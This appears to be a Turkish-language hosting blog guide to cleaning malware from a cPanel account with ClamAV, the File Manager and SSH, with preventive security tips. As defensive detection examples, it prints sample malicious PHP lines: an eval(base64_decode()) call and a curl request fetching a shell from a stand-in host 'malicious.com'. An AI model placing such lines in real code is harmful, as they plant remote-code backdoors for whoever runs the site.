Şimdi yükleniyor
İpuçları , , , , , , , , , ,

cPanel’de Virüs Temizleme Rehberi

cPanel'de Virüs Temizleme Rehberi

Web sitenizin performansı düştü mü? Ziyaretçileriniz beklenmedik sayfalara mı yönlendiriliyor? Yoksa Google, siteniz için “Bu site güvenli değil” uyarısı mı veriyor? Bu tür belirtiler, cPanel hesabınıza kötü amaçlı yazılım (malware) bulaşmış olabileceğine işaret eder. Kötü amaçlı dosyalar genellikle temalar, eklenti yüklemeleri, güvenlik zafiyetleri barındıran formlar veya güncel olmayan PHP sürümleri gibi çeşitli yollarla sisteme sızabilir. Bu durum, sadece sitenizin itibarını zedelemekle kalmaz, aynı zamanda veri kaybına, SEO sıralamalarınızın düşmesine ve hatta yasal sorunlara yol açabilir. Bu nedenle, web sitenizin güvenliğini sağlamak ve olası tehditleri ortadan kaldırmak için hızlı ve etkili bir müdahale şarttır.

Neyse ki cPanel, kullanıcılarına entegre virüs tarama araçları ve manuel müdahale imkanları sunarak, kötü amaçlı yazılımları tespit etmek ve temizlemek için güçlü çözümler sağlar. Bu kapsamlı rehberde, cPanel üzerinde virüs taraması ve temizleme sürecini adım adım anlatacak, olası riskleri en aza indirmek ve sitenizi güvende tutmak için alınması gereken önleyici tedbirleri detaylandıracağız.

1. Virüs Bulaşmasının Belirtilerini Anlamak

Temizlik sürecine başlamadan önce, sitenize virüs bulaştığına dair belirtileri doğru bir şekilde tanımlamak, sorunun kaynağını ve boyutunu anlamak açısından kritik öneme sahiptir. En yaygın enfeksiyon işaretleri şunlardır:

  • Web Sitenizin Otomatik Yönlenmesi

    Kullanıcılar sitenize girmeye çalıştığında, otomatik olarak alakasız veya şüpheli başka bir web sitesine yönlendiriliyorsa, bu büyük olasılıkla sitenize kötü amaçlı bir kodun enjekte edildiğini gösterir. Bu tür yönlendirmeler genellikle kullanıcıları phishing sitelerine, reklam içeriklerine veya başka zararlı yazılımlar indirmeye yönlendirebilir.

  • E-posta Hesaplarından Spam Gönderimleri

    cPanel’deki e-posta hesaplarınızdan sizin bilginiz dışında spam e-postalar gönderiliyorsa, bu durum sunucunuzun ele geçirildiğinin veya e-posta hesaplarınızın şifrelerinin tehlikeye girdiğinin açık bir işaretidir. Bu, sunucu IP adresinizin kara listeye alınmasına ve dolayısıyla meşru e-postalarınızın dahi spam olarak işaretlenmesine neden olabilir.

  • cPanel Dosya Yöneticisinde Şüpheli Dosyalar

    cPanel Dosya Yöneticisi’nde ‘.php.suspected’, ‘.js.bak’, ‘.html.bak’ gibi olağan dışı uzantılara sahip dosyalar veya tanımadığınız yeni dizinler görüyorsanız, bu dosyaların kötü amaçlı yazılımlar tarafından oluşturulmuş olma ihtimali çok yüksektir. Özellikle son değiştirilme tarihlerine göre sıralama yaparak, yakın zamanda eklenmiş veya değiştirilmiş şüpheli dosyaları tespit edebilirsiniz.

  • Google Search Console Uyarıları

    Google Search Console hesabınızda ‘zararlı içerik bulundu’ veya ‘hacklendi’ gibi uyarılar alıyorsanız, Google sitenizi kara listeye almış demektir. Bu durum, sitenizin arama sonuçlarından kaldırılmasına veya kullanıcıların sitenize erişmeye çalıştığında bir güvenlik uyarısı ile karşılaşmasına neden olur.

  • Anormal Kaynak Kullanımı

    cPanel istatistiklerinde CPU, RAM veya bant genişliği kullanımınızın anormal derecede yüksek olduğunu fark ediyorsanız, bu durum kötü amaçlı yazılımların sunucunuzda yoğun işlemler yürüttüğünü veya DDoS saldırılarının bir parçası olarak kullanıldığını gösterebilir. Bu durum, sitenizin yavaşlamasına ve hatta tamamen erişilemez hale gelmesine yol açar.

Bu belirtiler genellikle WordPress tabanlı sitelerde daha sık görülse de, Joomla, Drupal veya özel yazılımlar dahil her türlü İçerik Yönetim Sistemi (CMS) ve web uygulaması virüs bulaşmasına karşı risk altındadır. Erken teşhis, hızlı müdahale için anahtardır.

2. cPanel Üzerinden Virüs Taraması Yapmak

cPanel, genellikle ClamAV tabanlı bir virüs tarayıcısı ile birlikte gelir. Bu araç, sunucunuzdaki kötü amaçlı yazılımları tespit etmek için etkili bir ilk adımdır.

1. cPanel’e Güvenli Giriş Yapın

Tarayıcınızdan https://alanadiniz.com:2083 (veya https://alanadiniz.com/cpanel) adresine gidin ve kullanıcı adınız ile şifrenizi kullanarak oturum açın. Şifrenizin güçlü ve daha önce başka bir yerde kullanılmamış olduğundan emin olun.

2. Virus Scanner (ClamAV) Aracını Açın

cPanel ana menüsünde, genellikle “Advanced” (Gelişmiş) veya “Security” (Güvenlik) kategorisi altında bulunan Virus Scanner seçeneğini bulun ve tıklayın. Bu modül, sunucunuzda kurulu olan ClamAV antivirüs yazılımını kullanarak tarama yapar.

3. Tarama Alanını Seçin

Karşınıza çıkan ekranda, tarama yapmak istediğiniz alanı seçmeniz için dört farklı seçenek sunulur:

  • Mail: Sadece e-posta hesaplarınızdaki dosyaları ve ekleri tarar. E-posta yoluyla bulaşmış olabilecek tehditler için faydalıdır.
  • Entire Home Directory: Bu seçenek, cPanel hesabınızdaki tüm dosyaları, dizinleri ve alt dizinleri kapsayan en kapsamlı taramayı yapar. Web sitenizin kök dizini, e-posta dosyaları, veritabanı yedekleri ve diğer tüm veriler bu taramaya dahildir. Genellikle en doğru sonuçları verir.
  • Public Web Space: Yalnızca web sitenizin yayınlandığı public_html dizini ve altındaki dosyaları tarar. Web sitenize özgü enfeksiyonlar için idealdir.
  • Public FTP Space: FTP üzerinden yüklenmiş olabilecek kötü amaçlı dosyaları bulmak için FTP dizinlerini tarar.

En kapsamlı ve güvenilir sonuçları elde etmek için Entire Home Directory seçeneğini işaretlemeniz ve ardından “Scan Now” (Şimdi Tara) butonuna tıklamanız önerilir. Tarama süresi, hesabınızdaki dosya sayısına ve boyutuna göre değişiklik gösterebilir.

4. Tarama Sonuçlarını İnceleyin ve İşlem Yapın

Tarama tamamlandığında, ClamAV tespit ettiği virüslü veya şüpheli dosyaları “INFECTED” (Enfekte) olarak listeleyecektir. cPanel bu dosyalar için genellikle şu işlemleri yapma imkanı sunar:

  • Sil (Delete): Dosyayı sunucudan kalıcı olarak kaldırır. Bu seçeneği kullanmadan önce dosyanın gerçekten zararlı olduğundan ve sitenizin işlevselliği için gerekli olmadığından emin olun.
  • Karantinaya Al (Quarantine): Şüpheli dosyayı güvenli bir karantina dizinine taşır. Bu, dosyanın çalışmasını engeller ancak gerektiğinde geri yükleme imkanı sunar. Riskli ancak emin olamadığınız dosyalar için iyi bir seçenektir.
  • Yoksay (Ignore): Dosyayı enfekte olarak işaretlemez ve herhangi bir işlem yapmaz. Bu seçeneği yalnızca yanlış pozitif olduğundan emin olduğunuz durumlarda kullanın.

Şüpheli dosyaları doğrudan silmeden önce mutlaka cPanel yedeğinizi alın. Özellikle temel sistem dosyaları veya CMS çekirdek dosyaları enfekte görünüyorsa, silmek yerine karantinaya almak veya manuel olarak kontrol etmek daha güvenli olabilir.

3. Virüslü Dosyaları Manuel Olarak Temizleme

Bazı durumlarda, otomatik antivirüs tarayıcıları tüm zararlı yazılımları bulamayabilir veya tamamen temizleyemeyebilir. Bu gibi durumlarda, dosya yöneticisi veya SSH (Secure Shell) üzerinden manuel temizlik yapmak gerekebilir.

Dosya Yöneticisi ile Temizlik

  1. cPanel → File Manager (Dosya Yöneticisi) seçeneğini açın.
  2. Genellikle web sitenizin ana dizini olan public_html dizinine girin.
  3. Dosyaları “Last Modified” (Son Değişiklik) tarihine göre sıralayarak, yakın zamanda değiştirilmiş veya eklenmiş şüpheli dosyaları tespit etmeye çalışın. Özellikle normalde sık güncellenmeyen temel sistem dosyalarının (örneğin WordPress’teki wp-config.php veya index.php) değiştirilip değiştirilmediğini kontrol edin.
  4. Şüpheli uzantılara sahip .php, .js, .ico, .zip, .txt veya gizli dosyaları (örneğin .htaccess) kontrol edin. Bu dosyaların içine enjekte edilmiş olabilecek zararlı kodları arayın.
  5. Aşağıdaki gibi yaygın zararlı kod kalıplarını arayın. Bu kodlar genellikle base64 ile şifrelenmiş veya eval(), shell_exec() gibi tehlikeli PHP fonksiyonlarını kullanır:
    <?php eval(base64_decode('ZGFuZ2Vyb3VzX2NvZGU=')); ?>
<?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://malicious.com/shell.php"); /* ... */ ?>

    Bu tür kodları bulduğunuzda, ilgili kısmı silin veya dosyanın tamamını orijinal, temiz bir sürümüyle değiştirin.

  6. Eğer bir tema veya eklenti kaynaklı bir enfeksiyon olduğundan şüpheleniyorsanız, o tema veya eklentiyi tamamen kaldırıp, resmi kaynaktan indirdiğiniz temiz sürümünü yeniden yükleyin.
  7. Gizli dosyaları kontrol etmeyi unutmayın. Dosya Yöneticisi’nde ‘Ayarlar’ kısmından ‘Gizli Dosyaları Göster’ seçeneğini aktif ederek .htaccess gibi dosyaların içine yerleştirilmiş kötü amaçlı yönlendirme kodlarını bulabilirsiniz.

SSH Üzerinden Manuel Tarama (Root Kullanıcısı İçin)

Eğer sunucunuza root erişiminiz varsa, SSH üzerinden daha güçlü ve esnek tarama ve temizlik işlemleri yapabilirsiniz. Bu yöntem özellikle çok sayıda dosyanın taranması gerektiğinde veya otomatik araçların yetersiz kaldığı durumlarda etkilidir.

Belirli bir kullanıcının web dizinini (public_html) ClamAV ile taramak için:

clamscan -r /home/kullaniciadi/public_html/ --bell -i

Bu komut, /home/kullaniciadi/public_html/ dizinini rekürsif olarak tarar (-r), enfekte dosyaları bulduğunda sesli uyarı verir (--bell) ve sadece enfekte dosyaları gösterir (-i).

Tüm /home/ dizinini taramak ve enfekte dosyaları otomatik olarak silmek için (dikkatli kullanılmalıdır!):

clamscan -r /home/ --remove

Bu komut, tespit edilen tüm enfekte dosyaları otomatik olarak siler. Bu işlem geri alınamaz olduğundan, mutlaka öncesinde kapsamlı bir yedekleme yapmanız ve hangi dosyaların silineceğinden emin olmanız gerekmektedir. Yanlışlıkla kritik sistem dosyalarını silmek, sunucunuzun veya web sitenizin çalışmamasına neden olabilir.

4. Temizlikten Sonra Yapılması Gerekenler

Virüs temizliği tamamlandıktan sonra, gelecekteki saldırıları önlemek ve sistem güvenliğini sağlamak için bazı kritik adımların atılması gerekmektedir.

  1. Tüm Şifreleri Değiştirin: cPanel, FTP, e-posta hesapları, veritabanı kullanıcıları ve özellikle WordPress admin paneli gibi tüm önemli şifreleri hemen güncelleyin. Güçlü, benzersiz ve karmaşık şifreler kullanmaya özen gösterin.
  2. Eklenti ve Temaları Güncelleyin: Kullandığınız tüm CMS (WordPress, Joomla vb.) eklentilerini ve temalarını en güncel sürümlerine yükseltin. Eski ve güncellenmemiş yazılımlar genellikle bilinen güvenlik açıklarını barındırır ve saldırganlar için kolay bir hedef oluşturur. Kullanmadığınız eklenti ve temaları tamamen kaldırın.
  3. PHP Sürümünü Güncelleyin: cPanel’deki Select PHP Version (PHP Sürümü Seç) bölümünden desteklenen en güncel ve güvenli PHP sürümünü seçin. Eski PHP sürümleri, performans sorunlarının yanı sıra ciddi güvenlik zafiyetleri içerebilir.
  4. SSL Sertifikasını Yeniden Kurun veya Kontrol Edin: Bazı virüsler, sitenizin SSL sertifikasını manipüle ederek güvenli bağlantılarınızı tehlikeye atabilir veya yönlendirmeleri değiştirebilir. Eğer SSL sertifikanızda bir sorun olduğunu düşünüyorsanız, yeniden kurmayı veya sağlayıcınızla iletişime geçmeyi düşünebilirsiniz.
  5. Google Search Console’da Temizlik Talebi Gönderin: Eğer siteniz Google tarafından kara listeye alındıysa, Search Console üzerinden ‘Güvenlik Sorunları’ bölümüne giderek sorunu çözdüğünüzü bildirin ve sitenizin yeniden taranmasını talep edin. Bu, sitenizin arama sonuçlarına geri dönmesi için zorunludur.
  6. Kapsamlı Bir Yedekleme Yapın: Temizlikten sonra, sitenizin temiz bir yedeğini alın. Bu, gelecekte benzer bir durumla karşılaşıldığında hızlı bir şekilde geri dönmenizi sağlar.

5. Önleyici Güvenlik Önlemleri

Web sitenizin güvenliğini sürekli kılmak ve gelecekteki virüs bulaşmalarını önlemek için proaktif güvenlik önlemleri almanız şarttır. Pasif kalmak yerine aktif bir güvenlik stratejisi benimsemek, dijital varlıklarınızı korumanın en etkili yoludur.

  • Otomatik Tarama Planlayın: cPanel’de cron job (zamanlanmış görev) kullanarak haftalık veya günlük otomatik virüs taramaları planlayın. Bu, potansiyel tehditleri erken aşamada tespit etmenize yardımcı olur.
  • PHP mail() Fonksiyonunu Kontrol Edin: PHP’nin mail() fonksiyonunu sadece güvenilir ve gerekli uygulamalara açık tutun. Kontrolsüz kullanımı, sunucunuzdan spam gönderilmesine olanak tanıyabilir. Gerekirse, SMTP üzerinden e-posta gönderimi yapan eklentileri tercih edin.
  • WordPress Güvenlik Eklentileri Kullanın: Eğer WordPress kullanıyorsanız, Wordfence, iThemes Security veya Sucuri gibi güçlü güvenlik eklentilerini yükleyin ve yapılandırın. Bu eklentiler, güvenlik duvarı, zararlı yazılım taraması, oturum açma koruması ve diğer birçok güvenlik özelliğini bir arada sunar.
  • Gelişmiş Güvenlik Çözümlerini Aktif Edin: Hosting sağlayıcınızın cPanel’de ImunifyAV veya Imunify360 gibi gelişmiş güvenlik çözümlerini sunup sunmadığını kontrol edin. Bu araçlar, gerçek zamanlı zararlı yazılım tespiti, güvenlik duvarı, DDoS koruması ve sanal yama gibi özelliklerle sunucunuzu kapsamlı bir şekilde korur.
  • WAF (Web Application Firewall) Kullanın: Cloudflare gibi bir Web Uygulama Güvenlik Duvarı (WAF) hizmeti kullanarak, kötü amaçlı trafiği ve saldırıları web sitenize ulaşmadan önce engelleyebilirsiniz. WAF’lar, bilinen güvenlik açıklarına karşı koruma sağlar ve sitenizi daha dayanıklı hale getirir.
  • Düzenli Yedeklemeler Yapın: Otomatik ve manuel yedeklemeleri düzenli bir alışkanlık haline getirin. Bir saldırı durumunda, temiz bir yedeğe sahip olmak, sitenizi hızla eski haline getirmenin en güvenli yoludur.
  • Erişim Yetkilerini Kısıtlayın: Dosya ve dizin izinlerini (chmod) doğru şekilde ayarlayın. Genellikle dizinler için 755, dosyalar için 644 izinleri önerilir. 777 gibi tam erişim izinleri, güvenlik açıkları yaratabilir.

Önleyici Güvenlik Önlemleri Tablosu

Aşağıdaki tablo, web sitenizi güvende tutmak için alabileceğiniz temel önlemleri özetlemektedir:

ÖnlemAçıklamaFaydası
Otomatik TaramaHaftalık/Günlük virüs taramalarını cron job ile planlayın.Erken tehdit tespiti ve hızlı müdahale sağlar.
PHP Sürümü GüncellemeEn güncel ve desteklenen PHP sürümünü kullanın.Bilinen güvenlik açıklarını kapatır, performansı artırır.
Güçlü ŞifrelerTüm hesaplar için karmaşık, benzersiz şifreler kullanın.Brute-force saldırılarına karşı koruma sağlar.
Eklenti/Tema GüncellemeleriTüm CMS bileşenlerini güncel tutun, kullanılmayanları kaldırın.Yazılım zafiyetlerini ortadan kaldırır.
WAF KullanımıCloudflare gibi bir Web Uygulama Güvenlik Duvarı kullanın.Kötü amaçlı trafiği web sitenize ulaşmadan engeller.
Düzenli YedeklemeSitenizin ve veritabanınızın düzenli yedeklerini alın.Veri kaybını önler, felaket kurtarma imkanı sunar.
İzin KontrolüDosya ve dizin izinlerini doğru ayarlayın (755/644).Yetkisiz erişimi ve dosya manipülasyonunu engeller.
Gelişmiş Güvenlik YazılımlarıImunifyAV/360 gibi cPanel entegrasyonlarını kullanın.Gerçek zamanlı koruma, gelişmiş tehdit tespiti sağlar.

cPanel virüs temizleme süreci, hem otomatik araçların akıllıca kullanımı hem de manuel kontrollerle desteklenmelidir. Unutulmamalıdır ki, virüs bulaştıktan sonra temizlik yapmak mümkün olsa da, sitenizi sürekli olarak izlemek ve güçlü önleyici güvenlik önlemleri almak her zaman daha kolay, daha az maliyetli ve daha etkilidir. Dijital dünyada proaktif güvenlik yaklaşımı, web sitenizin ve çevrimiçi varlığınızın uzun ömürlü ve güvenli olmasının temelini oluşturur.

Etiket

Related Posts

You May Have Missed